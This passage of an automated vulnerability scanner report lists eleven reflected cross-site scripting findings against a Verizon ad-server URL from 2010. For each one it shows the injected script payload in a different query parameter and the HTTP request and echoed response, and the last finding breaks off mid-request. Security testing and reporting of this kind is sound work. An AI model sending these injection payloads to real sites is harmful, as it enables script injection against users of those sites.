2.441. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4daa"><script>alert(1)</script>d5404341735 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
artner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735" target="_top">
...[SNIP]...

2.442. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 577c7"><script>alert(1)</script>7bd9773acc was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.443. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec203"><script>alert(1)</script>f54ed3ebb44 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
zm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search=" target="_top">
...[SNIP]...

2.444. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dcbc"><script>alert(1)</script>588a49e61fd was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.445. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3855"><script>alert(1)</script>424effc9656 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&searc
...[SNIP]...

2.446. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b7c"><script>alert(1)</script>5aa14f10290 was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
acking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.447. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b9e"><script>alert(1)</script>c95b9106569 was submitted in the vec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.448. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b92"><script>alert(1)</script>a2d570f147e was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.449. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 830fd"><script>alert(1)</script>3e4bb5b3888 was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.450. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa0e"><script>alert(1)</script>31b9443c757 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.451. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f54fd"><script>alert(1)</script>ecbc842c8ef was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
